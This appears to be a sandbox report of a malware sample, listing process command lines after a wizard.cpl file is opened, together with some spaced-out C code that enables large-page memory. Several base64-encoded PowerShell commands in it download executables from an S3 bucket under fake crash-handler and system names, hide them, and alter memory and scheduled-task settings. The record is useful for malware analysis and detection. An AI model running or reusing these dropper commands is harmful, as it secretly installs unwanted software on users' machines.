                         A c c o u n t S i d ,                   / /   t a r g e t   S I D 
                         F A L S E ,                             / /   d o   n o t   d i s a b l e   a l l   r i g h t s 
                         & P r i v i l e g e S t r i n g ,       / /   p r i v i l e g e s 
                         1                                       / /   p r i v i l e g e   c o u n t 
                 ) ; 
         } 
 } 
 
 v o i d   m a i n ( ) 
 { 
         H A N D L E   h T o k e n   =   N U L L ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         D W O R D   d w B u f f e r S i z e   =   0 ; 
 
         / /   P r o b e   t h e   b u f f e r   s i z e   r e q i r e d   f o r   P T O K E N _ U S E R   s t r u c t u r e 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( h T o k e n ,   T o k e n U s e r ,   N U L L ,   0 ,   & d w B u f f e r S i z e )   & & 
                 ( G e t L a s t E r r o r ( )   ! =   E R R O R _ I N S U F F I C I E N T _ B U F F E R ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 / /   C l e a n u p 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         P T O K E N _ U S E R   p T o k e n U s e r   =   ( P T O K E N _ U S E R )   m a l l o c ( d w B u f f e r S i z e ) ; 
 
         / /   R e t r i e v e   t h e   t o k e n   i n f o r m a t i o n   i n   a   T O K E N _ U S E R   s t r u c t u r e 
         i f   ( ! G e t T o k e n I n f o r m a t i o n ( 
                 h T o k e n , 
                 T o k e n U s e r , 
                 p T o k e n U s e r , 
                 d w B u f f e r S i z e , 
                 & d w B u f f e r S i z e ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " G e t T o k e n I n f o r m a t i o n   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
 
                 / /   C l e a n u p 
                 C l o s e H a n d l e ( h T o k e n ) ; 
                 h T o k e n   =   N U L L ; 
 
                 r e t u r n   - 1 ; 
         } 
 
         / /   P r i n t   S I D   s t r i n g 
         L P W S T R   s t r s i d ; 
         C o n v e r t S i d T o S t r i n g S i d ( p T o k e n U s e r - > U s e r . S i d ,   & s t r s i d ) ; 
         a p p l o g ( L O G _ I N F O ,   " U s e r   S I D :   % S \ n " ,   s t r s i d ) ; 
 
         / /   C l e a n u p 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         N T S T A T U S   s t a t u s ; 
         L S A _ H A N D L E   p o l i c y H a n d l e ; 
 
         i f   ( s t a t u s   =   O p e n P o l i c y ( N U L L ,   P O L I C Y _ C R E A T E _ A C C O U N T   |   P O L I C Y _ L O O K U P _ N A M E S ,   & p o l i c y H a n d l e ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         / /   A d d   n e w   p r i v e l e g e   t o   t h e   a c c o u n t 
         i f   ( s t a t u s   =   S e t P r i v i l e g e O n A c c o u n t ( p o l i c y H a n d l e ,   p T o k e n U s e r - > U s e r . S i d ,   S E _ L O C K _ M E M O R Y _ N A M E ,   T R U E ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P S e t P r i v i l e g e O n A c c o u n t o l i c y   % d " ,   s t a t u s ) ; 
         } 
 
         / /   E n a b l e   t h i s   p r i v e l e d g e   f o r   t h e   c u r r e n t   p r o c e s s 
         h T o k e n   =   N U L L ; 
         T O K E N _ P R I V I L E G E S   t p ; 
 
         i f   ( ! O p e n P r o c e s s T o k e n ( G e t C u r r e n t P r o c e s s ( ) ,   T O K E N _ Q U E R Y   |   T O K E N _ A D J U S T _ P R I V I L E G E S ,   & h T o k e n ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " O p e n P r o c e s s T o k e n   # 2   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         t p . P r i v i l e g e C o u n t   =   1 ; 
         t p . P r i v i l e g e s [ 0 ] . A t t r i b u t e s   =   S E _ P R I V I L E G E _ E N A B L E D ; 
 
         i f   ( ! L o o k u p P r i v i l e g e V a l u e ( N U L L ,   S E _ L O C K _ M E M O R Y _ N A M E ,   & t p . P r i v i l e g e s [ 0 ] . L u i d ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " L o o k u p P r i v i l e g e V a l u e   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   G e t L a s t E r r o r ( ) ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         B O O L   r e s u l t   =   A d j u s t T o k e n P r i v i l e g e s ( h T o k e n ,   F A L S E ,   & t p ,   0 ,   ( P T O K E N _ P R I V I L E G E S ) N U L L ,   0 ) ; 
         D W O R D   e r r o r   =   G e t L a s t E r r o r ( ) ; 
 
         i f   ( ! r e s u l t   | |   ( e r r o r   ! =   E R R O R _ S U C C E S S ) ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " A d j u s t T o k e n P r i v i l e g e s   f a i l e d .   G e t L a s t E r r o r   r e t u r n e d :   % d \ n " ,   e r r o r ) ; 
                 r e t u r n   - 1 ; 
         } 
 
         / /   C l e a n u p 
         C l o s e H a n d l e ( h T o k e n ) ; 
         h T o k e n   =   N U L L ; 
 
         S I Z E _ T   p a g e S i z e   =   G e t L a r g e P a g e M i n i m u m ( ) ; 
 
         / /   F i n a l l y   a l l o c a t e   t h e   m e m o r y 
         c h a r   * l a r g e B u f f e r   =   V i r t u a l A l l o c ( N U L L ,   p a g e S i z e   *   N _ P A G E S _ T O _ A L L O C ,   M E M _ R E S E R V E   |   M E M _ C O M M I T   |   M E M _ L A R G E _ P A G E S ,   P A G E _ R E A D W R I T E ) ; 
         i f   ( l a r g e B u f f e r ) 
         { 
                 a p p l o g ( L O G _ I N F O ,   " V i r t u a l A l l o c   f a i l e d ,   e r r o r   0 x % x " ,   G e t L a s t E r r o r ( ) ) ; 
         } 
 } 

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss577F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi577C.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr577D.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr577E.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc JABwAGEAZwBlAGYAaQBsAGUAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAEMAbwBtAHAAdQB0AGUAcgBTAHkAcwB0AGUAbQAgAC0ARQBuAGEAYgBsAGUAQQBsAGwAUAByAGkAdgBpAGwAZQBnAGUAcwAKACQAcABhAGcAZQBmAGkAbABlAC4AQQB1AHQAbwBtAGEAdABpAGMATQBhAG4AYQBnAGUAZABQAGEAZwBlAGYAaQBsAGUAIAA9ACAAJABmAGEAbABzAGUACgAkAHAAYQBnAGUAZgBpAGwAZQAuAHAAdQB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwACgAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0ACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBwAGEAZwBlAGYAaQBsAGUAcwBlAHQAdABpAG4AZwAKACQAcABhAGcAZQBmAGkAbABlAHMAZQB0AC4ASQBuAGkAdABpAGEAbABTAGkAegBlACAAPQAgADQAMAAwADAACgAkAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAAuAE0AYQB4AGkAbQB1AG0AUwBpAHoAZQAgAD0AIAAyADAAMAAwADAACgAkAHAAYQBnAGUAZgBpAGwAZQBzAGUAdAAuAFAAdQB0ACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss6BB8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi6BA5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr6BA6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr6BA7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc TgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXAAiACAALQBOAGEAbQBlACAAIgBHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAASAB3AFMAYwBoAE0AbwBkAGUAIAAtAFYAYQBsAHUAZQAgADIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAEMAbwBuAHQAcgBvAGwAXABHAHIAYQBwAGgAaQBjAHMARAByAGkAdgBlAHIAcwAiACAALQBOAGEAbQBlACAAIgBIAHcAUwBjAGgATQBvAGQAIgAgAC0AVAB5AHAAZQAgAEQAVwBvAHIAZAAgAC0AVgBhAGwAdQBlACAAMgAgAC0ARgBvAHIAYwBlAAoACgBEAGkAcwBhAGIAbABlAC0ATQBNAEEAZwBlAG4AdAAgAC0AbQBjAAoARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAFAAYQB0AGgAIAAiAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwATQBlAG0AbwByAHkARABpAGEAZwBuAG8AcwB0AGkAYwBcACIAIAB8ACAARABpAHMAYQBiAGwAZQAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsACgA=

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7F64.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7F51.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7F52.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7F53.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAnAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAewB9AAoAZQBsAHMAZQAgAHsACgAJAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAcwA6AC8ALwBzADMALgB1AHMALQBlAGEAcwB0AC0AMQAuAGEAbQBhAHoAbwBuAGEAdwBzAC4AYwBvAG0ALwA5ADMAMAA3AGUAYgBjADUALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAALwBkAEkAbABoAG8AcwB0AC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUAAvAGQAbABJAGgAbwBzAHQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAVABFAE0AUAAvAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAKAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQAvAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgBBAHIAbQA2ADQALgBlAHgAZQAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AcwAzAC4AdQBzAC0AZQBhAHMAdAAtADEALgBhAG0AYQB6AG8AbgBhAHcAcwAuAGMAbwBtAC8AOQAzADAANwBlAGIAYwA1AC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAEEAcgBtADYANAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAQQByAG0ANgA0AC4AZQB4AGUACgB9AAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAEEAcgBtADYANAAuAGUAeABlAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAC8AdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAC8AYQBwAHAALwBUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKAAoAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUALwBFAG0AYgBtAGEAawBlAC4AZQB4AGUAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAxAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvADkAMwAwADcAZQBiAGMANQAvAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUALwBFAG0AYgBtAGEAawBlAC4AZQB4AGUACgB9AAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUALwBFAG0AYgBtAGEAawBlAC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAALwBVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIABoAHQAdABwAHMAOgAvAC8AcwAzAC4AdQBzAC0AZQBhAHMAdAAtADEALgBhAG0AYQB6AG8AbgBhAHcAcwAuAGMAbwBtAC8AOQAzADAANwBlAGIAYwA1AC8ARQBtAGIAZQBkAGkAdAAuAGUAeABlACAALQBPAHUAdABGAGkAbABlACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAvAEUAbQBiAGUAZABpAHQALgBlAHgAZQAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAC8ALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAC8ASQBzAGEAcwBzAC4AZQB4AGUACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=

C:\Windows\System32\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Temp1_wizard.zip\wizard.cpl",

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\New Compressed (zipped) Folder\86bb5e18da0ed3a8793cc3b38b57aa972a5d9ed0f07182712165f9703d81f27c.html

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffdb9109758,0x7ffdb9109768,0x7ffdb9109778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1608 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2912 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2904 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4732 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4840 --field-trial-handle=1688,i,4023323596969333027,9967372143795638306,131072 /prefetch:8

